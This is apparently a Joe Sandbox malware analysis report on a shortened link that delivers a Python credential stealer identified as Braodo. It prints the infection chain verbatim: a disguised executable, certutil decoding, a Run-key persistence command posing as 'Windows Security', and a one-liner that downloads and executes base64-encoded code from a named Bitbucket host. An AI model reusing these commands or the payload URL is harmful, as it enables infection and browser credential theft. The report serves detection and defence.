Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t.ly/SjDNX

Overview

General Information

Sample URL:https://t.ly/SjDNX
Analysis ID:1554449
Infos:

Detection

Python Stealer, Braodo
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Braodo
Yara detected Telegram RAT
Creates an autostart registry key pointing to binary in C:\Windows
Downloads suspicious files via Chrome
Sigma detected: Execution from Suspicious Folder
Sigma detected: Legitimate Application Dropped Script
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Drops PE files
Drops certificate files (DER)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Stores files to the Windows start menu directory
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1948,i,15826648908994825402,11418272317416250006,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/SjDNX" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • rundll32.exe (PID: 7384 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • 7zG.exe (PID: 7680 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\" -spe -an -ai#7zMap20132:206:7zEvent12301 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe (PID: 7776 cmdline: "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe" MD5: 4864A55CFF27F686023456A22371E790)
    • cmd.exe (PID: 7796 cmdline: cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Rar.exe (PID: 7940 cmdline: Rar x -pKPLbkjVZ5zAXUErg9hu3pw -inul -y QExvbmVOb25l.rar C:\Users\Public\QExvbmVOb25l MD5: 01F28B85ABF1993B7B14B3D15346F2E8)
      • certutil.exe (PID: 6532 cmdline: certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat" MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • reg.exe (PID: 6592 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • synaptics.exe (PID: 3312 cmdline: "C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
    • cmd.exe (PID: 7804 cmdline: cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 7948 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 8188 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 1656 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2160 --field-trial-handle=1600,i,3555974175840820386,6288481564636944147,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 2120 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 688 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1616,i,10171936117906713763,8070250402194629303,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BraodoYara detected BraodoJoe Security
          Process Memory Space: synaptics.exe PID: 3312JoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
            Click to see the 3 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))", CommandLine: "C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))", CommandLine|base64offset|contains: , Image: C:\Users\Public\QExvbmVOb25l\synaptics.exe, NewProcessName: C:\Users\Public\QExvbmVOb25l\synaptics.exe, OriginalFileName: C:\Users\Public\QExvbmVOb25l\synaptics.exe, ParentCommandLine: cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7796, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))", ProcessId: 3312, ProcessName: synaptics.exe
            Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\certutil.exe, ProcessId: 6532, TargetFilename: C:\Users\Public\Windows Security.bat
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security
            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7796, TargetFilename: C:\Users\Public\QExvbmVOb25l
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7796, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, ProcessId: 6592, ProcessName: reg.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7796, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, ProcessId: 6592, ProcessName: reg.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results
            Source: Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: nw.pdbh source: Rar.exe, 00000016.00000003.1874440484.00000246BFB5C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000000.1883786655.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp, synaptics.exe, 00000023.00000002.2455236872.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: synaptics.exe, 00000023.00000002.2561874177.000000006C0BB000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: synaptics.exe, 00000023.00000002.2565523236.000000006C18C000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32crypt.pdb## source: synaptics.exe, 00000023.00000002.2542827338.000000006BC90000.00000002.00000001.01000000.00000034.sdmp
            Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\pywintypes.pdb source: synaptics.exe, 00000023.00000002.2542082815.000000006BC6E000.00000002.00000001.01000000.00000035.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: synaptics.exe, 00000023.00000002.2561874177.000000006C0BB000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000002.1734634100.0000000073D91000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\python310.pdb source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Rar.exe, 00000016.00000000.1735961254.00007FF62D1B3000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Rar.exe, 00000016.00000000.1735961254.00007FF62D1B3000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\sqlite3.pdb source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: libmupdf.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_sqlite3.pdb source: synaptics.exe, 00000023.00000002.2556345443.000000006BF79000.00000002.00000001.01000000.00000019.sdmp
            Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: synaptics.exe, 00000023.00000002.2564436980.000000006C152000.00000002.00000001.01000000.00000015.sdmp
            Source: Binary string: SumatraPDF-no-MuPDF.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: synaptics.exe, 00000023.00000002.2572691476.000000006C334000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: synaptics.exe, 00000023.00000002.2562565513.000000006C0DC000.00000002.00000001.01000000.00000016.sdmp
            Source: Binary string: D:\a\1\b\libssl-1_1.pdbAA source: synaptics.exe, 00000023.00000002.2564436980.000000006C152000.00000002.00000001.01000000.00000015.sdmp
            Source: Binary string: SumatraPDF-1.5.3.0.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: synaptics.exe, 00000023.00000002.2550046792.000000006BE10000.00000002.00000001.01000000.0000001E.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000000.1883786655.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp, synaptics.exe, 00000023.00000002.2455236872.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\pywintypes.pdb++ source: synaptics.exe, 00000023.00000002.2542082815.000000006BC6E000.00000002.00000001.01000000.00000035.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: synaptics.exe, 00000023.00000002.2556799900.000000006C09C000.00000002.00000001.01000000.00000018.sdmp
            Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32crypt.pdb source: synaptics.exe, 00000023.00000002.2542827338.000000006BC90000.00000002.00000001.01000000.00000034.sdmp
            Source: Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000002.1734634100.0000000073D91000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:35 2023 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: synaptics.exe, 00000023.00000002.2572691476.000000006C334000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: C:\Users\LoneNone\Desktop\PDF SIDELOAD\SideLoad\Release\msimg32.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000002.1734780923.0000000073E06000.00000002.00000001.01000000.00000009.sdmp
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\Primality.pyJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\_IntegerBase.pyiJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\Numbers.pyiJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\Numbers.pyJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\_IntegerBase.pyJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\Primality.pyiJump to behavior
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: - https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 923- https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
            Source: synaptics.exe, 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: z"- https://www.facebook.com/groups/r equals www.facebook.com (Facebook)
            Source: synaptics.exe, 00000023.00000003.2133539100.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2521145479.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2138152554.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2136782600.0000000001F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://HDMHDMLoading...%s
            Source: synaptics.exe, 00000023.00000003.2245770456.00000000021D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2319593829.00000000021DC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F60000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2264921548.000000000224A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2322096151.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2244405952.0000000002754000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2277527988.000000000224A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260160456.0000000002248000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2241309089.000000000260E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2240278565.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2486798377.000000000224A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContribute
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlThe
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://blog.kowalczyk.infoKrzysztof
            Source: synaptics.exe, 00000023.00000003.2219374203.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org)
            Source: synaptics.exe, 00000023.00000003.1940113752.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1939977427.0000000002057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/
            Source: synaptics.exe, 00000023.00000003.1957786322.000000000203B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue12029
            Source: synaptics.exe, 00000023.00000003.2153905637.00000000023A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue14396.
            Source: synaptics.exe, 00000023.00000003.2153905637.00000000023A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue15756
            Source: synaptics.exe, 00000023.00000003.2041218643.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue16298)
            Source: synaptics.exe, 00000023.00000003.1957786322.000000000203B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue19404
            Source: synaptics.exe, 00000023.00000003.1885432522.0000000000CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue19619
            Source: synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2033832775.0000000001F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue28539
            Source: synaptics.exe, 00000023.00000003.1887784322.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue5845#msg198636
            Source: synaptics.exe, 00000023.00000003.2002411335.0000000002114000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2008327699.00000000023CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue874900
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: synaptics.exe, 00000023.00000003.2239174169.00000000045ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.17.2713&rep=rep1&type=pdf
